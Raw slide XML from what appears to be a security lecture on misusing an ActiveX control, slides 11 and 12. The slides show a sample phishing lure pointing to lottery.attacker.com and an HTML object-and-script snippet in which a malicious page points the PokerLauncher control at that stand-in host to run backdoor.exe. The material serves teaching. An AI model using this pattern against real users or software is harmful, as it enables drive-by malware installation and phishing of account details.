              <a:t>update.server.com/"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:alpha val="30000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PokerLauncher.StartGame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("poker.exe");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custData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84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184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9" grpId="0" animBg="1"/>
      <p:bldP spid="12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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295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pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="슬라이드 번호 개체 틀 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4051300" y="7237413"/>
            <a:ext cx="2493963" cy="32385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1306" tIns="45654" rIns="91306" bIns="45654"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{6553426B-37C1-429D-BEEB-664A7967DAB1}" type="slidenum">
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:pPr latinLnBrk="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19460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ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Potential Misuse of ActiveX Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19461" name="Picture 10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gray">
          <a:xfrm>
            <a:off x="488916" y="1636713"/>
            <a:ext cx="2571750" cy="20701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sp>
        <p:nvSpPr>
          <p:cNvPr id="19462" name="사각형 설명선 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4775196" y="4067175"/>
            <a:ext cx="5286379" cy="1357313"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -22884"/>
              <a:gd name="adj2" fmla="val -158156"/>
            </a:avLst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  <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="800" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>Congratulation!!! You just won </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>lottery! Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://lottery.attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>, enter your account information, and claim the prize.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3889840" y="1774747"/>
            <a:ext cx="3600000" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 33333"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
          <a:scene3d>
            <a:camera prst="orthographicFront">
              <a:rot lat="0" lon="10799999" rev="0"/>
            </a:camera>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="220073" tIns="52818" rIns="98082" bIns="49041" anchor="ctr">
            <a:flatTx/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="125413" indent="-125413" defTabSz="881063">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1"/>
              <a:t>Send an email </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="125413" indent="-125413" defTabSz="881063">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1" smtClean="0"/>
              <a:t>trap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1"/>
              <a:t>a victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19466" name="Picture 3" descr="C:\Documents and Settings\sweetlie\Local Settings\Temporary Internet Files\Content.IE5\81YR0P6F\MCj02825920000[1].wmf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418388" y="1493838"/>
            <a:ext cx="3214687" cy="2287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9" name="그룹 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="399799" y="3994945"/>
            <a:ext cx="1114408" cy="1183668"/>
            <a:chOff x="399799" y="3994945"/>
            <a:chExt cx="1114408" cy="1183668"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Picture 13" descr="C:\Documents and Settings\sweetlie\Local Settings\Temporary Internet Files\Content.IE5\NOBCR1O3\MCj02899620000[1].wmf"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads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560353" y="3994945"/>
              <a:ext cx="806929" cy="10001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2" name="TextBox 12"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="399799" y="4932392"/>
              <a:ext cx="1114408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ko-KR" sz="1000" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>PokerLauncher</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custData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94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62" grpId="0" animBg="1"/>
      <p:bldP spid="19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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295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pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="슬라이드 번호 개체 틀 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4051300" y="7237413"/>
            <a:ext cx="2493963" cy="32385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1306" tIns="45654" rIns="91306" bIns="45654"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{707EC810-1D41-4DC3-82D6-340A16006A6E}" type="slidenum">
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:pPr latinLnBrk="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20484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ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Potential Misuse of ActiveX Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20485" name="Picture 10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gray">
          <a:xfrm>
            <a:off x="488916" y="1636713"/>
            <a:ext cx="2571750" cy="20701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sp>
        <p:nvSpPr>
          <p:cNvPr id="20486" name="사각형 설명선 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2203428" y="4067175"/>
            <a:ext cx="8072494" cy="2714625"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8745"/>
              <a:gd name="adj2" fmla="val -59741"/>
            </a:avLst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  <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;object id="PokerLauncher" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>classid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>clsid:xxxxxxxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>xxxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>xxxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>-xx…"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>      &lt;param name="Server" value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/object&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>PokerLauncher.StartGame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:alpha val="30000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20487" name="Picture 3" descr="C:\Documents and Settings\sweetlie\Local Settings\Temporary Internet Files\Content.IE5\81YR0P6F\MCj02825920000[1].wm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418388" y="1493838"/>
            <a:ext cx="3214687" cy="2287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8" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3846502" y="1779588"/>
            <a:ext cx="3600450" cy="720725"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 33304"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="220073" tIns="52818" rIns="98082" bIns="49041" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="125413" indent="-125413" defTabSz="881063"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" noProof="1"/>
              <a:t>Visit </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="125413" indent="-125413" defTabSz="881063"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" noProof="1" smtClean="0"/>
              <a:t>malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" noProof="1"/>
              <a:t>web page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3703626" y="2923375"/>
            <a:ext cx="3600000" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 33333"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
          <a:scene3d>
            <a:camera prst="orthographicFront">
              <a:rot lat="0" lon="10799999" rev="0"/>
            </a:camera>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="220073" tIns="52818" rIns="98082" bIns="49041" anchor="ctr">
            <a:flatTx/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="125413" indent="-125413" defTabSz="881063">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1" smtClean="0"/>
              <a:t>Malicious web page </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="125413" indent="-125413" defTabSz="881063">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1" smtClean="0"/>
              <a:t>to exploit PokerLauncher</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="그룹 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="399799" y="3994945"/>
            <a:ext cx="1114408" cy="1183668"/>
            <a:chOff x="399799" y="3994945"/>
            <a:chExt cx="1114408" cy="1183668"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Picture 13" descr="C:\Documents and Settings\sweetlie\Local Settings\Temporary Internet Files\Content.IE5\NOBCR1O3\MCj02899620000[1].wmf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560353" y="3994945"/>
              <a:ext cx="806929" cy="10001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4" name="TextBox 12"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="399799" y="4932392"/>
              <a:ext cx="1114408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ko-KR" sz="1000" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>PokerLauncher</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="그룹 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5816606" y="4551935"/>
            <a:ext cx="3757848" cy="1771946"/>
            <a:chOff x="5816606" y="4551935"/>
            <a:chExt cx="3757848" cy="1771946"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="TextBox 15"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6199428" y="4551935"/>
              <a:ext cx="337502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2000" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>http://lottery.attacker.com/</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0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5816606" y="5923771"/>
              <a:ext cx="1824795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2000" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>backdoor.exe</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
